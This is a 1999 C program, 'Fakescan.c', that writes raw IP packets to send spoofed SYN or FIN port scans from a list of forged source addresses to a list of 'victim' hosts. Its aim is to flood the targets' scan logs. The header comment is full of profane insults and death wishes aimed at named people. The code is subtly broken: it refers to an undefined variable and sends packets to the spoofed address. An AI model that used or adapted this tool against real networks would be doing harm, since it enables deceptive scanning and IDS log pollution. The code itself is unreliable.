/*  Fakescan.c (c) 1999 Vortexia / Andrew Alston andrew@idle.za.org

Ok... more crap code from me... thats yes... entirely useless other than
as a proof of case.  I wrote this quickly while trying to prove the case
that logging portscans that are syn/fin based is entirely useless.

What the code does: 
It reads in a list of hosts to spoof from a spoof host, and sends fake
fin or syn scans to a list of hosts found in the victims file.
Sorry there is no dns resolve on hosts in those files, it was a quick job
while I was bored and I found better things to do while coding it so
I didnt get around to adding it.
 
The code is once again written for BSD and compiles with no warnings under
fbsd 3.2 - I hate linux - Dont expect a linux port from me, someone else -
feel free to make one

If you wanna use my code, as always, feel free but I expect credit
where credit is due, I.E you use my code, you put my name in your code.

Greets and Shoutouts..

Mithrandi - Thanks for your help
Ultima - For everything you've helped me with in the past
Van - What can I say, HI
TimeWiz - Thanks for help in times past, and for ideas for upcoming projects
Sniper - My partner in crime - You have and always will rock
Opium - HI
Hotmetal - A general greet
DrSmoke - HI
jus - My social engineering partner - lets continue to mindfuck together
OPCODE - Thanks for the help - you rock
gr1p and all the people at b4b0 - Keep rocking guys
To all the people at Forbidden knowledge - Good going - Keep it up
To everyone else on all the networks and channels I hang on,
a general greet and thanks - I couldnt keep doing what I do without you guys.

Fuckoffs, Curses and the likes:

To Sunflower - If you cant handle an insult in a piece of code - and think
		thats worth of an akill - GROW UP AND GO FUCK YOURSELF
To Gaspode - May you die a slow and painful death, and may the fleas of
		10000 camels infest your armpits
To the person who said coding stuff like this was for script kiddies - 
		GET A CLUE you know who you are
To anyone else I dont like - FUCK YOU
To anyone else who doesnt like me - FUCK YOU
*/

#define __FAVOR_BSD
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>

struct viclist
{
  struct in_addr victim;
  struct viclist *link;
};

struct slist
{
  struct in_addr spoof;
  struct slist *link;
};

int
main (int argc, char *argv[])
{

  int i = 0;
  int sock;
  int on = 1;
  struct sockaddr_in sockstruct;
  struct ip *iphead;
  struct tcphdr *tcphead;
  char evilpacket[sizeof (struct ip) + sizeof (struct tcphdr)];
  int seq, ack;
  FILE *victimfile;
  FILE *spooffile;
  char buffer[256];
  struct viclist *vcur, *vfirst;
  struct slist *scur, *sfirst;

  bzero (evilpacket, sizeof (evilpacket));

  vfirst = malloc (sizeof (struct viclist));
  vcur = vfirst;
  vcur->link = NULL;

  sfirst = malloc (sizeof (struct slist));
  scur = sfirst;
  scur->link = NULL;

  if (argc < 4)
    {
      printf ("Usage: %s scan_type ((S)yn/(F)in) spoof_file victim_file
Example: %s S spooffile victimfile\n", argv[0], argv[0]);
      exit (-1);
    };

  if ((strncmp (argv[1], "S", 1)) && (strncmp (argv[1], "F", 1)))
    {
      printf ("Scan type not specified\n");
      exit (-1);
    }

  if ((spooffile = fopen ((char *) argv[2], "r")) <= 0)
    {
      perror ("fopen");
      exit (-1);
    }
  else
    {
      while (fgets (buffer, 255, spooffile))
	{
	  if (!(inet_aton (buffer, &(scur->spoof))))
	    printf ("Invalid address found in victim file.. ignoring\n");
	  else
	    {
	      scur->link = malloc (sizeof (struct slist));
	      scur = scur->link;
	      scur->link = NULL;
	    }
	};
      bzero (buffer, sizeof (buffer));
    };

  fclose (spooffile);
  scur = sfirst;
  while (scur->link != NULL)
    {
      printf ("Found spoof host: %s\n", inet_ntoa (scur->spoof));
      scur = scur->link;
    };
  scur = sfirst;

  if ((victimfile = fopen ((char *) argv[3], "r")) <= 0)
    {
      perror ("fopen");
      exit (-1);
    }
  else
    {
      while (fgets (buffer, 255, victimfile))
	{
	  if (!(inet_aton (buffer, &(vcur->victim))))
	    printf ("Invalid address found in victim file.. ignoring\n");
	  else
	    {
	      vcur->link = malloc (sizeof (struct viclist));
	      vcur = vcur->link;
	      vcur->link = NULL;
	    }
	};
      bzero (buffer, sizeof (buffer));
    };
  fclose (victimfile);
  vcur = vfirst;
  while (vcur->link != NULL)
    {
      printf ("Found victim host: %s\n", inet_ntoa (vcur->victim));
      vcur = vcur->link;
    };
  vcur = vfirst;

  if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
      perror ("socket");
      exit (-1);
    }

  if (setsockopt (sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof (on)) <
      0)
    {
      perror ("setsockopt");
      exit (-1);
    }

  sockstruct.sin_family = AF_INET;
  iphead = (struct ip *) evilpacket;
  tcphead = (struct tcphdr *) (evilpacket + sizeof (struct ip));

  iphead->ip_hl = 5;
  iphead->ip_v = 4;
  iphead->ip_len = sizeof (struct ip) + sizeof (struct tcphdr);
  iphead->ip_id = htons (getpid ());
  iphead->ip_ttl = 255;
  iphead->ip_p = IPPROTO_TCP;
  iphead->ip_sum = 0;
  iphead->ip_tos = 0;
  iphead->ip_off = 0;
  tcphead->th_win = htons (512);
  if (!(strncmp (argv[1], "S", 1)))
    tcphead->th_flags = TH_SYN;
  else
    tcphead->th_flags = TH_FIN;
  tcphead->th_off = 0x50;

  while (vcur->link != NULL)
    {
      iphead->ip_dst = vcur->victim;
      sleep (1);
      while (scur->link != NULL)
	{
	  tcphead->th_sport = htons (rand () % time (NULL));
	  sockstruct.sin_port = tcp->th_sport;
	  iphead->ip_src = scur->spoof;
	  sockstruct.sin_addr = scur->spoof;
	  sleep (1);
	  for (i = 1; i <= 1024; i++)
	    {
	      srand (getpid ());
	      seq = rand () % time (NULL);
	      ack = rand () % time (NULL);
	      tcphead->th_seq = htonl (seq);
	      tcphead->th_ack = htonl (ack);
	      tcphead->th_dport = htons (i);
	      sendto (sock, &evilpacket, sizeof (evilpacket), 0x0,
		      (struct sockaddr *) &sockstruct, sizeof (sockstruct));
	    }
	  scur = scur->link;
	}
      scur = sfirst;
      vcur = vcur->link;
    }
  return (1);

};


syntax highlighted by Code2HTML, v. 0.9.1